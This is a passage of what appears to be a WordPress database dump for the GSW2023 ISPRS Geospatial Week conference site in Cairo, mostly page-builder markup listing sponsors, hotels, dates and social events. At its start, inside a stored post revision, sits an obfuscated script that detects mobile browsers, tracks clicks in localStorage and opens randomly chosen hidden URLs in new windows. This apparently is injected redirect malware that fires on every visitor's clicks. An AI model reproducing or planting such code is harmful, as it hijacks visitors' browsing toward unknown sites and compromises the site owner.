ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-25 16:29:45','2023-06-25 16:29:45','',3066,'https://gsw2023.com/?p=4830',0,'revision','',0),
(4831,4,'2023-06-25 16:47:57','2023-06-25 16:47:57','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1687571540500{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687710061920{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687564731927{margin-top: 8px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your 